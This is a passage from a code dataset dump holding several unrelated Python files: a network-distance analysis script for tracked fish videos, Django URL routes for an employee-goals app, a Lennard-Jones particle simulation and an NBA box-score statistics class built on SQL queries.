HammingIpsenMikhailov(), \\\n 'IpsenMikhailov': IpsenMikhailov(), \\\n 'PortraitDivergence': PortraitDivergence(), \\\n 'ResistancePerturbation': ResistancePerturbation(), \\\n 'Frobenius': Frobenius(), \\\n 'NetSimile': NetSimile(), \\\n 'DegreeDivergence': DegreeDivergence(), \\\n 'DeltaCon': DeltaCon(),\n# 'OnionDivergence': OnionDivergence(), \\\n 'DistributionalNBD': DistributionalNBD(),\\\n 'NetLSD': NetLSD(),\\\n 'QuantumJSD': QuantumJSD(),\\\n 'CommunicabilitySequence': CommunicabilityJSD(),\\\n 'D-measure': DMeasure(),\\\n# 'ResilienceDistance': ResilienceDistance(),\\\n }\n\n# place the actual functions into the dist_functions dict\nfor dist_name, dist_object in additional_dists.items():\n dist_functions[dist_name] = dist_object.dist\n \ndistances = {}\nfor title in titles_of_dists:\n distances[title] = dist_functions[title]\n\ngood_dists = {'JaccardDistance':distances['JaccardDistance'],\n# 'Hamming':distances['Hamming'], #requires constant network size\n 'DegreeDivergence':distances['DegreeDivergence'],\n 'PortraitDivergence':distances['PortraitDivergence'], #slow processing\n# 'QuantumJSD':distances['QuantumJSD'], #requires constant network size\n# 'ResistancePerturbation':distances['ResistancePerturbation'], #requires constant network size\n 'NetLSD':distances['NetLSD'],\n 'IpsenMikhailov':distances['IpsenMikhailov'],\n# 'NonBacktrackingDistance':distances['NonBacktrackingDistance'], #slow processing\n# 'D-measure':distances['D-measure'] #requires constant network size\n }\n\n\n\n\n\ncolors = [\"#91b43f\",\"#7463cd\",\"#54bc5b\",\"#c560c7\",\"#49925d\",\"#cf4085\",\"#49bfba\",\n \"#cf4d2b\",\"#6f8bce\",\"#dd862f\",\"#98558b\",\n \"#c7a745\",\"#dd85a8\", \"#777d35\",\"#c64855\",\n \"#9b5e2f\",\"#e0906e\"]\nnp.random.shuffle(colors)\n\n\n\n\n\n\n\n\n\n\n\n\nERROR_COUNT = 0\n\n\n\nif __name__ == \"__main__\":\n import argparse\n import glob\n import joblib\n import os\n \n 
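# Example invocation (illustrative only; the handle format follows the --handle help text below):\n # python dynamic_networks.py --handle 20180808_153229 --ncores 8 --skip 10\n 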
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--dir', type=str, required=False, default='/media/recnodes/recnode_2mfish/',\n\t\t\t help='path to directory containing checker vids')\n parser.add_argument('--handle', type=str, required=True, help='unique identifier that marks the files to process. Ideally use the timestamp of the recording, ie \"20180808_153229\".')\n parser.add_argument('--ncores', type=int, required=False, default=8, \n help='provide an integer indicating the number of core processors to use for this task')\n parser.add_argument('--process_frames', type=str, required=False, default='notDefined',\n help='pass frame numbers of start and end, with a comma between eg 2000,5000')\n parser.add_argument('--skip', type=int, required=False, default=1,\n help='pass number of frames to skip for divergence calculations')\n \n args = parser.parse_args()\n HANDLE = args.handle.split(',')\n DIRECTORIES = args.dir.split(',')\n\n for x in range(len(DIRECTORIES)):\n if DIRECTORIES[x][-1] != '/':\n DIRECTORIES[x] += '/'\n \n for term in HANDLE:\n for DIR in DIRECTORIES:\n for vDir in glob.glob(DIR + '*' + term + '*.stitched'):\n if os.path.exists(vDir + '/track/graphs/000000.graphml'): \n if os.path.exists(vDir + '/track/dynamic_network_distances_' + str(args.skip)+ '.svg'):\n continue\n\n #get data\n\n filelist = []\n #FN = '/media/recnodes/recnode_2mfish/reversals3m_512_dotbot_20181017_111201.stitched'\n #FN = '/media/recnodes/recnode_2mfish/coherencetestangular3m_128_dotbot_20181009_115202.stitched'\n for fn in glob.glob( vDir + '/track/graphs/*'):\n if int(fn.split('/')[-1].split('.')[0])%args.skip == 0:\n filelist.append(fn) \n filelist = sorted(filelist)\n \n if args.process_frames == 'notDefined':\n START, END = (0, len(filelist))\n else:\n START, END = [int(x) for x in args.process_frames.split(',')]\n \n DICT_OF_NETWORKS = {}\n print(\"...Processing: \", vDir)\n print(\"....loading network graphs\")\n for i in range(START, END):#1,len(filelist)): #FIXME\n if i%1000==0:\n print(i)\n DICT_OF_NETWORKS[i] = nx.read_graphml(filelist[i])\n \"\"\"\n try: \n nx.write_graphml(DICT_OF_NETWORKS, '/home/dan/Desktop/graphs_temp.graphml')\n except:\n print( \"couldn't save\")\n pass\n \"\"\"\n #this is where we actually do the calculations: \n print(\".....calculating distance measures\")\n distances = parallelProcessMyDictAsSerial(serialDistanceMeasures, \n DICT_OF_NETWORKS, \n args.ncores, \n **{'distance_measures':good_dists}) \n distances.sort_index(inplace=True)\n distances.index *= args.skip\n #distances = doit(DICT_OF_NETWORKS, nCores=args.ncores) \n #try:\n # print(\"......saving to pickle\")\n distances.to_pickle( vDir + '/track/dynamic_network_distances_' + str(args.skip)+ '.pickle')\n joblib.dump(distances, vDir + '/track/dynamic_network_distances_' + str(args.skip)+ '.joblib')\n #now we plot it \n print(\".......plotting results\")\n fig = plot_network_distances(DICT_OF_NETWORKS, distances)\n plt.savefig(vDir + '/track/dynamic_network_distances_' + str(args.skip)+ '.svg', dpi=425, bbox_inches='tight')\n print(\"finished with \", str(ERROR_COUNT), \"errors.\")\n print(\"DONE. Find results at \", vDir + '/track')\n #plt.show()\n \n","sub_path":"dynamic_networks.py","file_name":"dynamic_networks.py","file_ext":"py","file_size_in_byte":34454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"639673978","text":"from . 
import views\nfrom django.urls import path\n\nurlpatterns = [\n path('', views.Login.as_view(), name=\"Login\"),\n path('login/', views.Login.as_view(), name=\"login\"),\n path('logout/', views.logout_user, name=\"logout\"),\n path('signup/', views.signup, name=\"signup\"),\n path('reg_emp/', views.register_emp, name=\"reg_emp\"),\n path('register_man/', views.register_man, name=\"register_man\"),\n path('setting_form/', views.setting_form, name=\"setting_form\"),\n path('team_setting_form/', views.team_setting_form, name=\"team_setting_form\"),\n path('save_emp_Data/', views.save_emp_Data.as_view(), name=\"save_emp_Data\"),\n path('save_emp_goal_Data/', views.save_emp_goal_Data.as_view(), name=\"save_emp_goal_Data\"),\n path('save_team_goal_Data//', views.save_team_goal_Data, name=\"save_team_goal_Data\"),\n path('save_man_asso_Data/', views.save_man_asso_Data.as_view(), name=\"save_man_asso_Data\"),\n path('DisplayEmpData/', views.DisplayEmpData.as_view(), name=\"DisplayEmpData\"),\n path('EditDisplayEmpData/', views.EditDisplayEmpData.as_view(), name=\"EditDisplayEmpData\"),\n path('update_order//', views.updateOrder, name=\"update_order\"),\n path('delete_order///', views.deleteOrder, name=\"delete_order\"),\n path('add_emp_feedback///', views.add_emp_feedback, name=\"add_emp_feedback\"),\n path('search_emp_goal_Data/', views.search_emp_goal_Data.as_view(), name=\"search_emp_goal_Data\"),\n path('DisplayTeamData//', views.DisplayTeamData, name=\"DisplayTeamData\"),\n path('EditDisplayManAsso/', views.EditDisplayManAsso.as_view(), name=\"EditDisplayManAsso\"),\n path('DisplayTeamGoalData/', views.DisplayTeamGoalData.as_view(), name=\"DisplayTeamGoalData\"),\n path('updateTeamGoals//', views.updateTeamGoals, name=\"updateTeamGoals\"),\n path('deleteTeamGoals//', views.deleteTeamGoals, name=\"deleteTeamGoals\"),\n]\n\n","sub_path":"miss_management/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"381784040","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jan 24 09:55:07 2019\r\n\r\n@author: Priyanka\r\n\"\"\"\r\nimport numpy as np\r\nimport math as mt\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nfrom os import path\r\n\r\ndef KE(velocities):\r\n T=0\r\n for i in range(N):\r\n T=T+ np.vdot(velocities[i],velocities[i])\r\n return T\r\n\r\ndef create_picture(positions,t):\r\n plt.cla()\r\n plt.axis([0, L, 0, L])\r\n plt.setp(plt.gca(), xticks=[0, L], yticks=[0, L])\r\n for x,y in positions:\r\n atom = plt.Circle((x, y), R, fc='r')\r\n plt.gca().add_patch(atom)\r\n # plt.savefig(path.join('HT/',\"image-{0}.png\".format(t)))\r\n\r\ndef correction(positions):\r\n for i in range(N):\r\n if positions[i][0]>L:\r\n positions[i][0]=positions[i][0]-L\r\n if positions[i][0]<0:\r\n positions[i][0]=positions[i][0]+L\r\n if positions[i][1]>L:\r\n positions[i][1]=positions[i][1]-L\r\n if positions[i][1]<0:\r\n positions[i][1]=positions[i][1]+L\r\n return positions\r\n \r\ndef acce(rel):\r\n r_val=np.dot(rel,rel)**(0.5)\r\n acc=(48/(r_val**2))*((1/r_val)**(12)-0.5*((1/r_val)**6))*rel\r\n return acc\r\n\r\ndef topology(rel):\r\n if abs(rel[0])>0.5*L:\r\n rel[0]=rel[0]-L*np.sign(rel[0])\r\n if abs(rel[1])>0.5*L:\r\n rel[1]=rel[1]-L*np.sign(rel[1])\r\n return rel\r\n \r\n \r\nN=10\r\nL=15\r\nvelocities = np.zeros((N,2))\r\npositions = np.zeros((N,2))\r\nacc=np.zeros((N,2))\r\nR=0.3\r\nRc=5\r\ndist=1.0 ##minimum seperation while generating 
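\r\n## the loop below lays particles on a square lattice, one per grid cell spaced by dist, so no pair starts closer than dist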
\r\ni=0\r\n\r\nrow=0\r\ncol=0\r\nwhile(True):\r\n x=dist + dist*col\r\n y=dist + dist*row\r\n positions[i][0]=x\r\n positions[i][1]=y\r\n col+=1\r\n i=i+1\r\n if L-x= {0} AND g.season <= {1}'.format(years[0], years[1]))\n\n else:\n where_clause = add_where(where_clause, 'g.season = {0}'.format(years))\n elif modern_only:\n where_clause = add_where(where_clause, 'g.season > 1983')\n\n # add min and max date where clauses if they are provided\n if min_date:\n where_clause = add_where(where_clause, \"g.date_game >= '{}'\".format(min_date.strftime('%Y-%m-%d')))\n if max_date:\n where_clause = add_where(where_clause, \"g.date_game <= '{}'\".format(max_date.strftime('%Y-%m-%d')))\n\n # check where clause exists, then add playoffs filter to it\n # assert(where_clause != '', 'where clause not defined, must be defined at this point')\n if playoffs == 'playoffs':\n where_clause = add_where(where_clause, 'p.series_id <> 23 and p.series_id IS NOT NULL')\n playoff_table = 'LEFT JOIN playoffgames p on b.game_id = p.game_id'\n elif playoffs == 'regular':\n where_clause = add_where(where_clause, '(p.series_id = 23 or p.series_id IS NULL)')\n playoff_table = 'LEFT JOIN playoffgames p on b.game_id = p.game_id'\n else:\n playoff_table = ''\n # if neither add nothing to clause, want to return all games\n\n boxscore_columns = list(self.read_table(get_str='SHOW COLUMNS FROM boxscores').loc[:,'Field'])\n des_categories = [x for x in boxscore_columns if '_id' not in x] if categories==[] else categories\n stat_str = ', '. join(['{0}(b.{1}) AS {1}'.format(aggregator, cat) for cat in des_categories])\n\n if adv_stats:\n adv_columns = list(self.read_table(get_str='SHOW COLUMNS FROM adv_boxscores').loc[:,'Field'])\n des_adv = [x for x in adv_columns if '_id' not in x] if adv_categories==[] else adv_categories\n adv_agg = aggregator if aggregator == '' else 'AVG'\n adv_str = ','+', '. 
join(['{0}(a.{1}) AS {1}'.format(adv_agg, cat) for cat in des_adv])\n\n adv_table = 'LEFT JOIN adv_boxscores a ON b.game_id = a.game_id and b.player_id = a.player_id'\n\n pct_agg = aggregator if aggregator == '' else 'SUM'\n for shot_type in ['fg','fg3','ft']:\n if shot_type in des_categories and shot_type + 'a' in des_categories:\n shot_str = ', {0}(b.{1})/{0}(b.{1}a) AS {1}_pct'.format(pct_agg, shot_type)\n stat_str += shot_str\n # add fg2 stats if fg and fg3 stats are in data\n if categories == []:\n for attempt in ['', 'a']:\n stat_str += ', {0}(b.fg{1}-b.fg3{1}) AS fg2{1}'.format(aggregator, attempt)\n stat_str += ', {0}(b.fg-b.fg3)/{0}(b.fga-b.fg3a) AS fg2_pct'.format(pct_agg)\n\n if 'ast' in des_categories and 'tov' in des_categories:\n stat_str += ', {0}(b.ast)/{0}(b.tov) AS assist_tov'.format(pct_agg)\n if sum([(x in des_categories) for x in ['pts','fga','fta']]) == 3:\n stat_str += ', {0}(b.pts)/(2*({0}(b.fga)+0.44*{0}(b.fta))) as ts_pct'.format(pct_agg)\n\n if groupby == 'game_id':\n extra_group = 'g.home_pts, g.home_team_id, g.visitor_pts, g.visitor_team_id, g.date_game, '\n elif player == None and player_fields:\n extra_group = 'b.player_id, '\n extra_groupby = 'b.player_id, '\n if groupby_team:\n extra_groupby = 'b.team_id, ' + extra_groupby\n extra_group = 'b.team_id, ' + extra_group\n elif return_teams:\n extra_group = 'GROUP_CONCAT(DISTINCT b.team_id ORDER BY g.date_game ASC) AS team_ids, ' + extra_group\n no_groupby = (groupby == '' or groupby == None)\n if no_groupby:\n return_season = 'MIN(g.season) AS min_season, MAX(g.season) AS max_season, '\n else:\n return_season = 'g.season, '\n\n if aggregator == '':\n full_str = '''SELECT {0}g.season, g.date_game, {1}{4}\n FROM boxscores b\n {5}\n LEFT JOIN games g ON b.game_id = g.game_id\n {2}\n {3}\n ORDER BY g.date_game ASC'''.format(extra_group, stat_str, playoff_table, where_clause,\n adv_str, adv_table)\n else:\n full_str = '''SELECT {0}{5} COUNT(b.pts) AS game_count, {1}{6}\n FROM boxscores b\n {7}\n LEFT JOIN games g ON b.game_id = g.game_id\n {2}\n {3}\n GROUP BY {4}'''.format(extra_group, stat_str, playoff_table, where_clause,\n extra_groupby, return_season, adv_str, adv_table)\n if not no_groupby:\n full_str += '''g.{0}\n ORDER BY g.{0} ASC'''.format(groupby)\n\n to_add = ['min_season','max_season'] if no_groupby else ['season']\n self.summary_cats[self.current_summary] += to_add\n\n if not suppress_query:\n print(full_str)\n start_time = time.time()\n self.summary[self.current_summary] = self.read_table(get_str=full_str)\n print('{} SQL query takes {:.1f} seconds.'.format(self.current_summary, time.time() - start_time))\n\n if self.summary[self.current_summary].empty:\n print('{} dataframe is empty.'.format(self.current_summary))\n else:\n if return_teams and lastteam_only:\n self.summary[self.current_summary].loc[:,'team_id'] = self.summary[self.current_summary]['team_ids'].str.split(',').str[-1].astype(int)\n self.summary[self.current_summary] = self.summary[self.current_summary].drop(columns='team_ids', axis=1)\n\n if convert_ids:\n self.convert_ids('player', ['last_name','first_name','height','weight'])\n self.convert_ids('team', ['abbreviation'], column_convert={'abbreviation':'team'})\n if groupby == 'game_id':\n for home_visitor in ['home', 'visitor']:\n self.convert_ids('team', ['abbreviation'], header_override= home_visitor+ '_team_id', column_convert={'abbreviation': home_visitor + '_team'})\n self.clean_games(game_total=~team)\n\n def convert_ids(self, id_type, des_columns, column_convert=None, 
header_override=None, keep_id=False):\n '''Use to merge on id column of a table in the db. i.e. convert player_id to player name.\n Takes current summary df and replaces the id column with the desired columns from the given table in the database.\n\n Keyword Arguments:\n id_type - the id name, must refer to a table name and the id name of the header\n des_columns - the columns from the id table to attach to the summary df\n column_convert - a dict where keys are original header names and values are desired values. Converts any relevant header names to desired name (default None)\n keep_id - If true, will keep the id column (default None)\n '''\n id_header = id_type + '_id'\n if id_header in self.summary[self.current_summary].columns or header_override != None:\n id_df = self.read_table(id_type+'s', [id_header] + des_columns)\n left_header = id_header if header_override == None else header_override\n return_df = self.summary[self.current_summary].merge(id_df, how='left', left_on=left_header, right_on=id_header)\n if not keep_id:\n for header in [left_header, id_header]:\n if header in return_df.columns:\n return_df = return_df.drop(columns=[header])\n\n self.summary_cats[self.current_summary] += des_columns\n self.summary_cats[self.current_summary] = list(set(self.summary_cats[self.current_summary]))\n if column_convert:\n self.summary_cats[self.current_summary] = [column_convert[x] if x in column_convert.keys() else x for x in self.summary_cats[self.current_summary]]\n return_df = return_df.rename(columns=column_convert)\n columns = [x for x in return_df.columns if x not in self.summary_cats[self.current_summary]]\n self.summary[self.current_summary] = return_df[self.summary_cats[self.current_summary] + columns]\n\n def df_ids(self, df, id_type, des_columns, column_convert=None, header_override=None, keep_id=False):\n '''Use to merge on id column of a table in the db. i.e. convert player_id to player name.\n Takes df provided and replaces the id column with the desired columns from the given table in the database.\n\n Keyword Arguments:\n id_type - the id name, must refer to a table name and the id name of the header\n des_columns - the columns from the id table to attach to the summary df\n column_convert - a dict where keys are original header names and values are desired values. 
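For example, {'abbreviation': 'team'} would rename the merged abbreviation column to team. 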
Converts any relevant header names to desired name (default None)\n keep_id - If true, will keep the id column (default False)\n '''\n id_header = id_type + '_id'\n assert id_header in df.columns or header_override != None, 'id_type not in df columns.'\n table_name = id_type+'s' if id_type[-1] != 's' else id_type\n id_df = self.read_table(table_name, [id_header] + des_columns)\n left_header = id_header if header_override == None else header_override\n return_df = df.merge(id_df, how='left', left_on=left_header, right_on=id_header)\n if not keep_id:\n for header in [left_header, id_header]:\n if header in return_df.columns:\n return_df = return_df.drop(columns=[header])\n\n if column_convert:\n return_df = return_df.rename(columns=column_convert)\n\n return return_df\n\n def apply_qualifiers(self, qualifiers, return_subset=True, sort_on=None, sort_asc=False, all_columns=False):\n '''Applies a dict of qualifiers to the summary df, outputting the df with only items matching the qualifiers.\n Each key should be given in a string '>10' or '<10' form.\n\n Keyword Arguments:\n qualifiers - dict of qualifier column name and string qualifier\n return_subset - if True, only return the items matching qualifier, otherwise returns full df with qualifier column (default True)\n sort_on - will return the df sorted by this column, if not set will sort on the qualifier column (default None)\n sort_asc - if true, sort ascending (default False)\n all_columns - by default will only return the summary cats and the qualifier columns (default False)\n '''\n return_df = self.summary[self.current_summary].copy()\n condition_series = pd.Series(dtype=bool)\n for column, threshold in qualifiers.items():\n if sort_on == None:\n sort_on = column\n if re.match('<|>.*', threshold):\n more_than = threshold[0] == '>'\n threshold_float = float(threshold[1:])\n else:\n more_than = False\n threshold_float = float(threshold)\n\n if more_than:\n current_series = return_df.loc[:,column] >= threshold_float\n else:\n current_series = return_df.loc[:,column] <= threshold_float\n if condition_series.empty:\n condition_series = current_series\n else:\n condition_series = condition_series & current_series\n\n current_cats = self.summary_cats[self.current_summary]\n desired_columns = current_cats + [x for x in list(qualifiers.keys()) if x not in current_cats]\n if sort_on:\n desired_columns.append(sort_on)\n\n if return_subset:\n return_df = return_df[condition_series].sort_values(sort_on, ascending=sort_asc)\n else:\n return_df.loc[:,'qualifier'] = condition_series\n desired_columns.append('qualifier')\n\n if all_columns:\n non_columns = [column for column in return_df.columns if column not in desired_columns]\n return return_df[desired_columns + non_columns]\n else:\n return return_df[desired_columns]\n\n def find_streaks(self, qualifier_dict, summary_name=None, groupby='player'):\n '''Return a df of the top streaks matching the qualifiers given\n\n Keyword Arguments:\n qualifier_dict - the dict of qualifiers to apply\n summary_name - the summary df to apply the qualifiers to, if not set use current summary df (default None)'''\n assert groupby in ['player'] or 'team' in groupby, 'Groupby must be player or team.'\n groupby_column = ['first_name', 'last_name'] if groupby=='player' else groupby\n\n if summary_name:\n self.set_summary(summary_name)\n streak_df = self.apply_qualifiers(qualifier_dict, return_subset=False, sort_on='date_game', sort_asc=True, all_columns=False).copy()\n if 'first_name' in streak_df.columns:\n 
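# pandas groupby silently drops rows whose group key is NaN, so blank out missing first names before grouping\n 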
streak_df.loc[:,'first_name'] = streak_df.loc[:,'first_name'].fillna('')\n streak_df = streak_df.dropna(subset=[groupby_column] if type(groupby_column) != list else groupby_column)\n\n streak_df.loc[:,'cumsum'] = streak_df.groupby(groupby_column, as_index=False).cumsum()['qualifier']\n streak_df.loc[:,'prev_total'] = streak_df.loc[:,'cumsum'].where(~streak_df.loc[:,'qualifier'], np.nan)\n streak_df.loc[:,'ffill'] = streak_df.groupby(groupby_column, as_index=False)['prev_total'].transform(lambda x: x.ffill().fillna(0))['prev_total']\n streak_df.loc[:,'cumsumffill'] = streak_df.loc[:,'cumsum'] - streak_df.loc[:,'ffill']\n streak_df.loc[:,'after'] = streak_df.groupby(groupby_column, as_index=False)['qualifier'].shift(-1)['qualifier'].fillna(False)\n streak_df.loc[:,'streak'] = streak_df.loc[:,'cumsumffill'].where(~streak_df.loc[:,'after'], 0)\n\n summary_columns = ['date_game','streak']\n if groupby == 'player':\n summary_columns = ['last_name','first_name', 'team'] + summary_columns\n else:\n summary_columns = [groupby_column] + summary_columns\n\n return_summary = streak_df[streak_df.loc[:,'streak'] > 1]\n return_summary = return_summary.sort_values('streak', ascending=False)[summary_columns].reset_index(drop=True)\n return_summary.index = return_summary.index+1\n\n return return_summary.rename(columns={'date_game':'streak_end'})\n\n def clean_games(self, summary_name=None, game_total=False):\n '''Classifies rows as home team, checks games data matches boxscore data, removes surplus columns.\n\n Keyword Arguments:\n summary_name - The summary to work on (default None)\n '''\n if summary_name != None:\n self.set_summary(summary_name)\n df = self.get_summary()\n\n if game_total:\n pts_errors = sum(df.loc[:,'pts'] != (df.loc[:,'home_pts'] + df.loc[:,'visitor_pts']))\n assert pts_errors == 0, \"{} games with points mismatch\".format(pts_errors)\n else:\n home_index = (df.loc[:,'home_team'] == df.loc[:,'team'])\n df.loc[:,'is_home'] = home_index\n\n expected_homes = sum(home_index) / len(home_index)\n\n assert expected_homes == 0.5, \"Expected 50% home games, returned {:.2%}\".format(expected_homes)\n home_games = df[home_index]\n visitor_games = df[~home_index]\n home_errors = sum(home_games.loc[:,'pts'] != home_games.loc[:,'home_pts'])\n visitor_errors = sum(visitor_games.loc[:,'pts'] != visitor_games.loc[:,'visitor_pts'])\n assert home_errors == 0, \"{} home games with points mismatch\".format(home_errors)\n assert visitor_errors == 0, \"{} visitor games with points mismatch\".format(visitor_errors)\n\n remove_cols = ['home_pts','visitor_pts']\n if not game_total:\n remove_cols += ['home_team','visitor_team']\n\n df = df.drop(labels=remove_cols, axis=1)\n self.summary_cats[self.current_summary] = [x for x in self.summary_cats[self.current_summary] if x not in remove_cols]\n self.summary[self.current_summary] = df\n\n def season_games(self, seasons=(1984,2100), convert_ids=True, summary_name='games'):\n '''Reads the game data for the given season: each game's date, scores etc. 
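For example, season_games(seasons=(2010, 2015)) loads the 2010 through 2015 seasons inclusive, while season_games(seasons=2016) loads a single season. 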
Df is then stored in summary named \"games\".\n\n Keyword arguments:\n seasons - The season or min/max seasons to read games for, must be an integer or tuple/list of length 2.\n convert_ids - Boolean, if set will convert ids to values (default True)\n summary_name - The name to store the df as (default 'games')\n '''\n self.set_summary(summary_name)\n\n if type(seasons) == list or type(seasons) == tuple:\n assert len(seasons) == 2, 'Must provide int or tuple/list of length 2'\n min_season = seasons[0]\n max_season = seasons[1]\n season_str = 'g.season as season, '\n else:\n assert type(seasons) == int, 'Must provide int or tuple/list of length 2'\n min_season, max_season = seasons, seasons\n season_str = ''\n\n if convert_ids:\n team_str = 't1.abbreviation AS home_team, t2.abbreviation AS visitor_team, '\n team_join = '''LEFT JOIN teams t1 on g.home_team_id = t1.team_id\n LEFT JOIN teams t2 on g.visitor_team_id = t2.team_id'''\n else:\n team_str = 'g.home_team_id AS home_team, g.visitor_team_id AS visitor_team, '\n team_join = ''\n\n sql_str = '''SELECT {2}date_game, {3}\n home_pts > visitor_pts AS home_victory FROM games g\n LEFT JOIN playoffgames p on g.game_id = p.game_id\n {4}\n WHERE g.season >= {0} AND g.season <= {1} AND (p.series_id = 23 or p.series_id IS NULL)'''.format(\n min_season, max_season, season_str, team_str, team_join)\n\n season_games = self.read_table(get_str=sql_str)\n season_games.loc[:,'visitor_victory'] = 1 - season_games.loc[:,'home_victory']\n\n self.summary[self.current_summary] = season_games\n\n def standings(self, max_date=None, rank_method='min', override_df=pd.DataFrame()):\n '''Calculates the standings at the date provided.\n The games summary for the given season must be already stored. Run season_games if it is not.\n Returns the games included in the standings and the league standings. Ties are all given the same ranking by default.\n\n Keyword arguments:\n max_date - The date to take the standings on. If not provided, will give current standings (default None)\n rank_method - The method used to sort the standings (default 'min')\n override_df - If provided, will use this df instead of stored df (default empty DataFrame)\n '''\n if override_df.empty:\n assert 'games' in self.summary.keys(), '\"games\" summary not loaded, please run season_games function.'\n games_restricted = self.summary['games'].copy()\n else:\n games_restricted = override_df.copy()\n\n if max_date != None:\n season_start = games_restricted['date_game'].min()\n assert max_date >= season_start, 'Date provided is before the beginning of the season. 
Please provide date after: {}'.format(season_start)\n\n games_restricted = games_restricted[games_restricted['date_game'] <= max_date]\n\n home_visitor = ['home', 'visitor']\n standings_list = []\n for i in range(2):\n standings_temp = games_restricted.groupby(home_visitor[i] + '_team').agg(\n {home_visitor[i]+'_victory':sum,\n home_visitor[-1-i]+'_victory':sum}).rename(columns={home_visitor[i]+'_victory':'W_'+home_visitor[i],\n home_visitor[-1-i]+'_victory':'L_'+home_visitor[i]})\n standings_temp.index.name = None\n standings_list.append(standings_temp)\n\n standings = pd.concat(standings_list, axis=1)\n for W_L in ['W', 'L']:\n standings.loc[:,W_L] = standings[W_L+'_home']+ standings[W_L+'_visitor']\n standings.loc[:,'Played'] = standings['W'] + standings['L']\n standings.loc[:,'W_pct'] = standings['W'] / standings['Played']\n standings.loc[:,'position'] = standings['W_pct'].rank(ascending=False, method=rank_method).astype(int)\n\n return games_restricted, standings.sort_values('position')\n\n def wpct_all(self, override_df=pd.DataFrame()):\n '''Returns a df containings the W pct for teams per season.\n Must run the season games query separately over more than 1 season.\n\n Keyword arguments:\n override_df - If provided this df will be used instead of the stored games df\n '''\n if override_df.empty:\n if 'games' not in self.summary.keys():\n print('\"games\" summary loaded, season_games function run for all modern (>1983) seasons.')\n self.season_games()\n all_games = self.summary['games'].copy()\n else:\n all_games = override_df.copy()\n\n all_standings = []\n for season, season_df in all_games.groupby('season'):\n temp_df = season_df.drop('season', axis=1)\n _, temp_standings = self.standings(override_df=temp_df)\n temp_standings = temp_standings.reset_index().rename(columns={'index':'team'})\n temp_standings.loc[:,'season'] = season\n all_standings.append(temp_standings[['team','season','W_pct']])\n\n return pd.concat(all_standings)\n\n def playoffseries(self, games_name='playoffgames', series_name='playoffseries', modern_only=True):\n '''Queries database for playoff games. Runs function to derive information from the raw playoff game data.\n i.e. number of games in the series, possible number of games, cumulative series score\n Creates a df containing each individual game and a df with each series. 
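A minimal usage sketch (assuming stats is an instance of this class): call stats.playoffseries(), then read stats.summary['playoffgames'] and stats.summary['playoffseries']. 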
Dfs are stored in summary dict.\n\n Keyword arguments:\n games_name - The key to use in the summary dict for the playoff games df (default 'playoffgames')\n series_name - The key to use in the summary dict for the playoff series df (default 'playoffseries')\n modern_only - Only return seasons after 1983 (default True)\n '''\n sql_str = '''SELECT p.playoffgames_id, p.game_id, p.series_id, p.game_no, g.season, g.date_game, g.home_team_id, g.visitor_team_id, g.home_pts > g.visitor_pts AS home_wins\n FROM playoffgames p\n INNER JOIN games g ON g.game_id = p.game_id\n WHERE p.series_id <> 23'''\n if modern_only:\n sql_str += ' and g.season > 1983'\n\n playoffgames = self.read_table(get_str=sql_str)\n\n team_ids = playoffgames[['home_team_id','visitor_team_id']]\n playoffgames.loc[:,'teams_combo'] = team_ids.min(axis=1).astype(str) + ',' + team_ids.max(axis=1).astype(str)\n\n # create a unique value for each series so it is easy to group each series\n playoffgames = playoffgames.sort_values(['season', 'series_id', 'teams_combo'])\n false_series_ids = playoffgames.groupby(['season', 'series_id', 'teams_combo'], as_index=False)['game_id'].min().rename(columns={'game_id':'false_series_id'})\n playoffgames = playoffgames.merge(false_series_ids, how='left', on=['season', 'series_id', 'teams_combo'])\n playoffgames = playoffgames.drop(['teams_combo'], axis=1)\n\n playoffgames.loc[:,'homecourt_team_id'] = playoffgames['home_team_id'].where(playoffgames['game_no']==1, np.nan)\n playoffgames.loc[:,'visitorcourt_team_id'] = playoffgames['visitor_team_id'].where(playoffgames['game_no']==1, np.nan)\n playoffgames.loc[:,'homecourt_team_id'] = playoffgames.loc[:,'homecourt_team_id'].fillna(method='ffill').astype(int)\n playoffgames.loc[:,'visitorcourt_team_id'] = playoffgames.loc[:,'visitorcourt_team_id'].fillna(method='ffill').astype(int)\n\n playoffgames.loc[:,'homecourt_wins'] = playoffgames['home_wins'].where(playoffgames['home_team_id'] == playoffgames['homecourt_team_id'], 1-playoffgames['home_wins'])\n playoffgames.loc[:,'homecourt_cumwins'] = playoffgames.groupby('false_series_id')['homecourt_wins'].cumsum()\n playoffgames.loc[:,'visitorcourt_cumwins'] = playoffgames['game_no'] - playoffgames['homecourt_cumwins']\n playoffgames.loc[:,'series_score'] = playoffgames['homecourt_cumwins'].astype(str) + '-' + playoffgames['visitorcourt_cumwins'].astype(str)\n\n assert (playoffgames['homecourt_cumwins'] + playoffgames['visitorcourt_cumwins']).max() <= 7, 'More than 7 games in a series'\n assert playoffgames['homecourt_cumwins'].max() <= 4, 'More than 4 wins by a team with homecourt in a series'\n assert playoffgames['visitorcourt_cumwins'].max() <= 4, 'More than 4 wins by a team without homecourt in a series'\n\n # create df that has one row per series, most columns are just duplicated in initial table, others require some aggregation\n playoffseries = playoffgames.groupby('false_series_id').agg({'series_id':'first',\n 'season':'first',\n 'homecourt_team_id':'first',\n 'visitorcourt_team_id':'first',\n 'game_no':'max',\n 'homecourt_cumwins':'max',\n 'visitorcourt_cumwins':'max',\n 'series_score':','.join}\n ).rename(columns={'game_no':'games_required',\n 'homecourt_cumwins':'homecourt_wins',\n 'visitorcourt_cumwins':'visitorcourt_wins',\n 'series_score':'series_timeline'}\n ).reset_index()\n playoffseries.loc[:,'series_timeline'] = '0-0,'+playoffseries['series_timeline']\n\n self.season_games(convert_ids=False)\n w_pct = self.wpct_all()\n for h_v in ['home', 'visitor']:\n playoffseries = 
